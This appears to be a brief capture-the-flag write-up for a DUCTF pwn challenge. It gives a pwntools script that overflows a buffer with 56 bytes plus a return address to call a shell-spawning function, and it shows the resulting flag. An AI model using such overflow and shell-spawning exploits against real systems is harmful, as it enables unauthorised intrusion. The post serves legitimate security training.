Tags: pwn buffer
Rating:
Here is the exploit script
```
from pwn import *
nc = remote('chal.duc.tf', 30002)
get_shell = '\xca\x06\x40\x00\x00\x00\x00\x00'
nc.sendlineafter(': ', 'A' * 56 + get_shell)
nc.interactive()
```
Here is the flag
`DUCTF{h0w_d1d_you_c4LL_That_funCT10n?!?!?}`
